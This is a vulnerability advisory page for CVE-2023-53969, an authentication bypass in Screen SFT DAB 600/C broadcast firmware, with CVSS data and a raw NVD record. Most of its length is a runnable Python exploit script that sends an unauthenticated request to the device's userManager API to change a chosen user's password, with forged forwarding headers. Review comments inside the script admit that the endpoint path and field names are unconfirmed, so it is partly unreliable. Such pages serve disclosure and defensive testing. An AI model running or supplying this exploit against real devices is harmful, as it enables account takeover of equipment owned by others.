Security Vulnerability Report
CVE-2023-53969 CVSS 7.5 HIGH

CVE-2023-53969

Published: 2025-12-22 22:16:02
Last Modified: 2025-12-26 16:50:56

Description

Screen SFT DAB 600/C firmware 1.9.3 contains a session management vulnerability that allows attackers to bypass authentication controls by exploiting IP address session binding. Attackers can reuse the same IP address and issue unauthorized requests to the userManager API to change user passwords without proper authentication.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
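CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Note: the raw record at the end of this page also carries a CVSS 4.0 assessment of 9.3 CRITICAL (VC:H/VI:H/VA:H). The 3.1 vector above rates integrity impact as None, although the description is of an unauthenticated password change, so the 7.5 score may understate the issue when prioritising remediation.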

Configurations (Affected Products)

cpe:2.3:o:dbbroadcast:sft_dab_600\/c_firmware:1.9.3:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dbbroadcast:sft_dab_600\/c:-:*:*:*:*:*:*:* - NOT VULNERABLE
Screen SFT DAB 600/C firmware <= 1.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2023-53969 PoC - Screen SFT DAB Authentication Bypass
# Target: Screen SFT DAB 600/C firmware <= 1.9.3 (the CPE data on this page
# lists firmware 1.9.3)
# Vulnerability: per the advisory text, sessions are bound to the client IP
# address, so a request arriving from that address can change a user's
# password through the userManager API without authenticating.
#
# NOTE(review): the advisory text on this page names the userManager API but
# gives neither a URL path nor a request format. The path, JSON field names
# and response strings used below are therefore unconfirmed — TODO verify
# against the vendor/third-party advisories before relying on this script as
# a reproduction or as the basis for a detection signature.


def exploit(target_ip: str, target_username: str, new_password: str) -> bool:
    """Send one unauthenticated password-change request to the userManager API.

    Builds a JSON body with an empty ``sessionId`` and POSTs it over plain
    HTTP to the device, then prints the status code and response body and
    classifies the outcome by substring-matching the body.

    Args:
        target_ip: IP address of the Screen SFT DAB device under test.
        target_username: Username whose password the request asks to change.
        new_password: New password value placed in the request body.

    Returns:
        bool: True only when the device answers HTTP 200 and the body contains
        "success" or "password changed" (case-insensitive); False for every
        other response and for any ``requests`` transport error.
    """
    # NOTE(review): the original author describes this path as "typically"
    # correct; nothing on this page confirms it.
    api_endpoint = f"http://{target_ip}/api/userManager"

    # Request body. No credential or token is included: the only
    # session-related field is an empty sessionId.
    # NOTE(review): field names are assumed, not taken from the advisory text.
    payload = {
        "action": "changePassword",
        "username": target_username,
        "newPassword": new_password,
        "sessionId": "",  # sent empty
    }

    # Both forwarding headers are set to the device's own address.
    # NOTE(review): whether the firmware consults either header is not
    # established by the advisory text — TODO confirm. Do not treat their
    # presence as a reliable indicator when writing detections.
    headers = {
        "Content-Type": "application/json",
        "X-Forwarded-For": target_ip,
        "X-Real-IP": target_ip,
        "User-Agent": "Mozilla/5.0 (compatible; Screen-SFT-Client/1.0)"
    }

    try:
        print(f"[*] Targeting: {target_ip}")
        print(f"[*] Attempting to change password for user: {target_username}")

        # verify=False turns off TLS certificate checks in requests; the URL
        # above is plain http, so it has no effect on this request.
        response = requests.post(
            api_endpoint,
            json=payload,
            headers=headers,
            timeout=10,
            verify=False
        )

        # The full response body is echoed to stdout.
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Body: {response.text}")

        # Outcome is a heuristic: a substring match on the body of a 200
        # response. What the device actually returns is not shown on this
        # page, so a True/False here is not proof either way — confirm the
        # account state on the device itself.
        if response.status_code == 200:
            if "success" in response.text.lower() or "password changed" in response.text.lower():
                print("[+] Exploitation successful! Password has been changed.")
                return True
            elif "unauthorized" in response.text.lower() or "forbidden" in response.text.lower():
                print("[-] Exploitation failed - target may not be vulnerable or IP not spoofable.")
                return False

        # Non-200 status, or a 200 whose body matched none of the strings.
        # NOTE(review): indentation was lost on this page; this return is
        # placed at the try-body level to match the documented bool return.
        return False

    except requests.exceptions.RequestException as e:
        # Connection errors, timeouts and other transport failures.
        print(f"[-] Request failed: {str(e)}")
        return False


def main():
    """Read <target_ip> <username> <new_password> from argv and call exploit().

    Prints usage and exits with status 1 when fewer than three arguments are
    given. The boolean returned by exploit() is not used, so the process exit
    status does not reflect the outcome.
    """
    if len(sys.argv) < 4:
        print("Usage: python cve-2023-53969.py <target_ip> <username> <new_password>")
        print("Example: python cve-2023-53969.py 192.168.1.100 admin NewPass123!")
        sys.exit(1)

    # The new password is taken from the command line, so it will be visible
    # in shell history and process listings on the testing host.
    target_ip = sys.argv[1]
    username = sys.argv[2]
    new_password = sys.argv[3]

    exploit(target_ip, username, new_password)


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53969", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:16:01.723", "lastModified": "2025-12-26T16:50:55.857", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Screen SFT DAB 600/C firmware 1.9.3 contains a session management vulnerability that allows attackers to bypass authentication controls by exploiting IP address session binding. Attackers can reuse the same IP address and issue unauthorized requests to the userManager API to change user passwords without proper authentication."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", 
"Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:sft_dab_600\\/c_firmware:1.9.3:*:*:*:*:*:*:*", "matchCriteriaId": "B51EAD42-9B3F-44D5-973A-4758498D1339"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:sft_dab_600\\/c:-:*:*:*:*:*:*:*", "matchCriteriaId": "97E91C9F-B55C-4B1A-BE03-D1F03AC90FE5"}]}]}], "references": [{"url": "https://www.dbbroadcast.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51456", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/screen-sft-dab-c-firmware-authentication-bypass-password-change", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5772.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5772.php", "source": 
"134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}